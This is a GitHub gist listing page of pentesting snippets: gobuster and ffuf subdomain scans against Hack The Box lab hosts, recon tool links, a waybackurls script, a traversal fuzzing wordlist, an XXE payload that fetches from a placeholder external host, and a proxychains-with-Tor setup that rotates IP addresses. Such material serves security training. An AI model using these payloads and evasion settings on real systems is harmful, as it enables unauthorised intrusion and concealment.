Pentesting-Exploitation Programs and Commands , Protocols Network / Ports
MD ISMAIL SOJAL 0xSojalSec
🤒
0xSojalSec
/ Exploitation.md
Created
July 24, 2022 18:10
— forked from yezz123/Exploitation.md
Pentesting-Exploitation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 | |
| =============================================================== | |
| Gobuster v3.1.0 | |
| by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) | |
| =============================================================== | |
| [+] Url: http://horizontall.htb/ | |
| [+] Method: GET | |
| [+] Threads: 200 | |
| [+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | |
| [+] User Agent: gobuster/3.1.0 |
0xSojalSec
/ vhost.sh
Created
July 24, 2022 18:11
— forked from oxtd/vhost.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ffuf -c -u http://bolt.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.bolt.htb" -fl 505 | |
| /'___\ /'___\ /''___\ | |
| /\ \__/ /\ \__/ __ __ /\ \__/ | |
| \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ | |
| \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ | |
| \ \_\ \ \_\ \ \____/ \ \_\ | |
| \/_/ \/_/ \/___/ \/_/ | |
| v1.3.1 Kali Exclusive <3 |
0xSojalSec
/ readme.MD
Created
July 24, 2022 18:11
— forked from nordineb/readme.MD
Subdomain Enumeraton Tools,Wordlists and Online DNS tools.
https://github.com/aboul3la/Sublist3r https://github.com/jhaddix/domain https://github.com/guelfoweb/knock https://github.com/TheRook/subbrute https://github.com/blechschmidt/massdns https://bitbucket.org/LaNMaSteR53/recon-ng https://github.com/caffix/amass https://github.com/cakinney/domained https://github.com/rbsec/dnscan
0xSojalSec
/ Ultimate-Cheatsheet.md
Created
July 24, 2022 18:11
— forked from bgoonz/Ultimate-Cheatsheet.md
Ultimate-Cheatsheet
0xSojalSec
/ XXE_payloads
Created
July 26, 2022 16:15
— forked from mgeeky/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
0xSojalSec
/ dicc.txt
Created
July 26, 2022 18:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ..;/ | |
| @ | |
| [ | |
| \ | |
| \…..\\\…..\\\…..\\\ | |
| ] | |
| _ | |
| __ | |
| ` | |
| ~/ |
0xSojalSec
/ subdomain_wordlist.md
Created
July 29, 2022 13:46
— forked from cihanmehmet/subdomain_wordlist.md
Subdomain Wordlist
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt
0xSojalSec
/ waybackurls.py
Created
August 8, 2022 16:20
— forked from mhmdiaa/waybackurls.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
0xSojalSec
/ how to use
Created
August 10, 2022 09:00
— forked from carlware/how to use
proxychains and tor (change ip ~10 seconds)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # install | |
| sudo apt-get install proxychains | |
| sudo apt-get install tor | |
| # then update the files /etc/proxychains.conf and /etc/tor/torrc with the given config | |
| # restart tor server | |
| sudo service restart tor |